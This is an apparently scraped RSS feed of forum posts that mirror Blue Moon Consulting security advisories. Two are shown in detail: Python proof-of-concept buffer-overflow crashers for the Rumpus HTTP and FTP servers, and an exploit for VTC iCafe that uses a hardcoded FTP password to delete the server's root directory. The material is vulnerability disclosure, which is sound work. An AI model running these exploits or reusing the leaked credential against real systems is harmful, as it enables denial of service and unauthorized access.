<![CDATA[Messages posted by "bmrobot"]]> /hvaonline/posts/listByUser/177769.html JForum - http://www.jforum.net Insecure secure cookie in Tornado /hvaonline/posts/preList/35503/218484.html#218484 /hvaonline/posts/preList/35503/218484.html#218484 GMT Multiple Vulnerabilities in PyForum /hvaonline/posts/preList/32568/200712.html#200712 /hvaonline/posts/preList/32568/200712.html#200712 GMT Backdoor in PyForum /hvaonline/posts/preList/32373/199487.html#199487 /hvaonline/posts/preList/32373/199487.html#199487 GMT Remote code execution in BKAV eOffice /hvaonline/posts/preList/31074/191732.html#191732 /hvaonline/posts/preList/31074/191732.html#191732 GMT (BMSA-2009-05) Cross Site Request Forgery in Yahoo! 360plus /hvaonline/posts/preList/29717/183200.html#183200 /hvaonline/posts/preList/29717/183200.html#183200 GMT [BMSA-2009-04] Remote Denial of Service in Internet Explorer /hvaonline/posts/preList/28662/176733.html#176733 /hvaonline/posts/preList/28662/176733.html#176733 GMT [BMSA-2009-03] Multiple vulnerabilities in OpenSite v2.1 /hvaonline/posts/preList/27865/170897.html#170897 /hvaonline/posts/preList/27865/170897.html#170897 GMT XML Injection in PyBlosxom /hvaonline/posts/preList/27612/168854.html#168854 /hvaonline/posts/preList/27612/168854.html#168854 GMT Authentication bypass in Interspire Shopping Cart /hvaonline/posts/preList/27227/166273.html#166273 /hvaonline/posts/preList/27227/166273.html#166273 GMT Two buffer overflow vulnerabilities in Rumpus http://www.maxum.com/Rumpus/News601.html. :Public disclosure: December 01, 2008 :Exploit code: For the vulnerability in HTTP component:: from socket import socket, AF_INET, SOCK_STREAM host = "192.168.1.12" port = 80 s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) s.send('z' * 2908 + '\n\n') s.recv(1024) s.close() For the vulnerability in FTP component:: from socket import socket, AF_INET, SOCK_STREAM host = "192.168.1.12" port = 21 user = "regular" pass_ = "training" commands = [ 'user regular\n', 'pass training\n', 'mkd ' + 'z' * 1046 + 'abcd\n' ] s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) s.recv(1024) for line in commands: s.send(line) s.recv(1024) s.close() Disclaimer ---------- The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time. ]]> /hvaonline/posts/preList/26506/161058.html#161058 /hvaonline/posts/preList/26506/161058.html#161058 GMT Insecure default FTP password in VTC iCafe Code:
BLUE MOON SECURITY ADVISORY 2008-08
===================================


:Title: Insecure default FTP password in VTC iCafe
:Severity: Critical
:Reporter: Blue Moon Consulting
:Products: VTC iCafe 1.17
:Fixed in: --


Description
-----------

VTC iCafe is an internet cafe management application. It uses a hardcoded insecure default FTP password ``VTCIntecom`` / ``VTCIntecom``. The FTP server listens on port 6655 and distributes update files to the clients. A malicious user could use this knowledge to a) cause a denial of services on the clients by removing the FTP root directory, or b) place malwares such as virus, trojan on the client by replacing the update files.

Workaround
----------

There is no workaround.

Fix
---

There is no fix at the moment. Customers are advised to contact the vendor for a proper fix.

Disclosure
----------

Blue Moon Consulting adapts `RFPolicy v2.0 <http://www.wiretrip.net/rfp/policy.html>`_ in notifying vendors.

:Initial vendor contact:

  August 12, 2008: Initial contact sent to support.icafe@vtc.vn

:Vendor response: --

:Public disclosure: August 20, 2008

:Exploit code:

::

  import ftplib
  
  ftp = ftplib.FTP()
  ftp.connect("localhost", 6655)
  ftp.login("VTCIntecom", "VTCIntecom")
  ftp.sendcmd("RMD \x00")
  ftp.quit()

Disclaimer
----------

The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.
]]>
/hvaonline/posts/preList/24502/148109.html#148109 /hvaonline/posts/preList/24502/148109.html#148109 GMT